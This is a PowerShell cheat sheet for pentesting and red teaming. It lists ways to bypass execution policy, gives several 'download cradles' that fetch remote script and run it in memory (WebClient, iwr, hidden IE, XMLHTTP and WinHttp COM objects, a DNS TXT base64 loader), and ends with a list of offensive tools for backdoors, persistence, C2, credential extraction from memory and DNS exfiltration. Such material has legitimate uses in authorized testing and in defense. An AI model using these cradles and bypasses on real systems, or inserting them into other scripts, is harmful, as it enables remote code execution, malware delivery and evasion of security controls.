Powershell modules and commands that come in handy for pentests and red team assessments.
PowerShell execution policies let you determine the conditions under which PowerShell loads configuration files and runs scripts.
You can set an execution policy for the local computer, for the current user, or for a particular session. You can also use a Group Policy setting to set execution policy for computers and users.
Execution policies for the local computer and current user are stored in the registry. You do not need to set execution policies in your PowerShell profile. The execution policy for a particular session is stored only in memory and is lost when the session is closed.
The execution policy is not a security system that restricts user actions. For example, users can easily circumvent a policy by typing the script contents at the command line when they cannot run a script. Instead, the execution policy helps users to set basic rules and prevents them from violating them unintentionally.
Fire up powershell.exe and type in:
Get-ExecutionPolicy -List
To bypass the Execution Policy fire in the following commands:
- PowerShell.exe -noprofile -
- powershell -nop
- Powershell -command "Command"
- Powershell -c
- powershell.exe -EncodedCommand $EncodedCommand
- invoke-command -scriptblock {Command}
- invoke-command -computername Computername -scriptblock {get-executionpolicy} | set-executionpolicy -force
- Get-Content .powershellfile.ps1 | Invoke-Expression
- GC .powershellfile.ps1 | iex
- PowerShell.exe -ExecutionPolicy Bypass
- PowerShell.exe -ExecutionPolicy UnRestricted
- PowerShell.exe -ExecutionPolicy Remote-signed
- Disable-ExecutionPolicy
- Powershell.exe Set-ExecutionPolicy Bypass
- Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned
- Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted
- Powershell.exe -Exec Bypass
- Changing the Registry : HKEY_CURRENT_USER\Software\MicrosoftPowerShell\1\ShellIds\Microsoft.PowerShell
Simple Download Cradle
IEX (New-Object Net.Webclient).downloadstring("path-to-pwsh-script")
Simple Download Cradle For PowerShell 3.0+
IEX (iwr 'path-to-pwsh-script')
Hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('path-to-pwsh-script');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
Msxml2.XMLHTTP COM object
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','path-to-pwsh-script',$false);$h.send();iex $h.responseText
WinHttp COM object
$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','path-to-pwsh-script',$false);$h.send();iex $h.responseText
DNS TXT approach, code to execute needs to be a base64 encoded string stored in a TXT record
IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0]))))
nishang - Offensive PowerShell for penetration testing and offensive security.
File System Security - Allows a much easier management of permissions on files and folders.
PowerForensics - Popular live disk forensics platform for windows.
PowerSploit - Post-exploitation framework.
PowerShellEmpire - Post-exploitation agent.
PSReflect - Easily define in-memory enums, structs, and Win32 functions in PowerShell.
ADRecon - ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.
BloodHound - Easily identify highly complex attack paths that would otherwise be impossible to quickly identify.
Invoke-Obfuscation - PowerShell command and script obfuscator.
PowerBreach - PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system.
PowerShellArsenal - A PowerShell Module Dedicated to Reverse Engineering
Generate-Macro - Powershell script will generate a malicious Microsoft Office document with a specified payload and persistence method
Invoke-AltDSBackdoor - This script will obtain persistence on a Windows 7+ machine under both Standard and Administrative accounts by using two Alternate Data Streams
Powershell-C2 - A PowerShell script to maintain persistance on a Windows machine.
mimikittenz - A post-exploitation powershell tool for extracting juicy info from memory.
InsecurePowerShell - PowerShell with some security features removed.
PoshC2 - Powershell C2 Server and Implants.
p0wnedShell - PowerShell Runspace Post Exploitation Toolkit.
DNSExfiltrator - Data exfiltration over DNS request covert channel.
PowerCat - A PowerShell TCP/IP swiss army knife.